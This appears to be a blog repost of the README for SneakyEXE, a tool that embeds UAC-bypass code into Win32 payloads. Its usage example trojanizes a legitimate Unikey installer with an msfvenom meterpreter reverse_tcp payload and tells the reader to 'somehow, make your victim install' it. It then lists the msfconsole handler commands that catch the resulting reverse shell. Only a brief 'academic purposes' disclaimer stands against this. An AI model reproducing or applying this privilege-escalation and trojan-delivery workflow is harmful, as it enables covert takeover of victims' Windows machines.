SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload
Posted by Frames on 7:34 PM
About SneakyEXE
SneakyEXE is a tool that helps you embed a UAC-bypassing function into your custom Win32 payloads (x86_64 architecture specifically).
SneakyEXE was tested on:
- Windows 7, 8, 10 (64 bit)
- Parrot Security OS 4.7
Requirements of SneakyEXE:
- For Linux:
  Architecture: Optional
  Python 3.7.x: Yes
  Module: termcolor
  Distro: Any
  Distro version: Any
- For Windows:
  Architecture: x86_64
  Python 3.7.x: No
  Module: No
  Windows version: 7, 8, 10
SneakyEXE's Installation for Linux
You must install Python 3 first:
- For Debian-based distros:
sudo apt install python3
- For Arch Linux based distros:
sudo pacman -S python3
And then, open your Terminal and enter these commands:
SneakyEXE's Installation for Windows
- Download the SneakyEXE-master zip file.
- Unzip it into a directory of your choice.
- Change dir to \SneakyEXE\Win32\.
- Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
- (Optional: you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
NOTE: The payload can only be executed successfully by a user with Administrator privilege. Users with a limited token won't succeed.
SneakyEXE GUI version installation for Windows
You must install Python 3 first. Download and run the Python 3.7.x setup file from Python.org. On the Install Python 3.7 screen, enable Add Python 3.7 to PATH.
Download the SneakyEXE-master zip file and unzip it.
And then, open PowerShell or CMD in the SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these commands:
pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe
How to use SneakyEXE?
Example:
I downloaded Unikey from Unikey.org.
And then, I used msfvenom to inject a payload into UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file uNiKeY.exe.
After that, to embed UAC-Bypassing codes into uNiKeY.exe, I used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE
And then, somehow, make your victim install the payload that was embedded with UAC-Bypassing codes and enter these commands:
sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LPORT <Your port>
exploit
and wait...
Disclaimer:
- This tool was made for academic purposes or ethical cases only. I ain't taking any responsibility for your actions if you abuse this tool for any black-hat activity.
- Feel free to use this project in your software, just don't reclaim the ownership.
Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).
Author: Copyright © 2019 by Zenix Blurryface.